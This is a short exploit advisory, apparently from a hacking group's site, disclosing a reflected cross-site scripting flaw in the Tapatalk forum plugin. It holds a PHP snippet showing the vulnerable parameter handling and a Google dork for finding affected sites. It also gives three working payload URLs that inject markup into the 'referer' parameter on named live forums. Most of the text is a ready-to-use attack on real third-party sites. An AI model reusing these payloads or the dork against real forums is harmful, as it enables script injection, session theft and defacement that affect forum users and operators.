################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _ __ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / \____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, / /____/ Janissaries.Org ################################################################################## Exploit Title : Tapatalk Universal Forum Application XSS Vulnerability (All Version) Author : E. Burtay Sahin Author Mail : admin@burtay.org Author Homepage : http://www.burtay.org Community Hpage : http://www.janissaries.org Google Dork : inurl:mobiquo Vendor Homepage : http://tapatalk.com/ Software Link : http://tapatalk.com/activate_tapatalk.php Version : All Version ################################################################################## P0C $ads_url = $protocol.'tapatalk.com/welcome_screen.php' .'?referer='.urlencode($referer) .'&code='.urlencode($code) .'&board_url='.urlencode($board_url) .'&lang='.urlencode($lang) .$byo .'&callback=?'; ################################################################################## 3 Live Examples 1.)Version ip34_3.8.2 https://forums.plex.tv/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr 2.)Version vb3x_4.3.2 http://forum.xda-developers.com/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr 3.)Version pb30_4.4.0 http://www.passion-multirotor.fr/forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr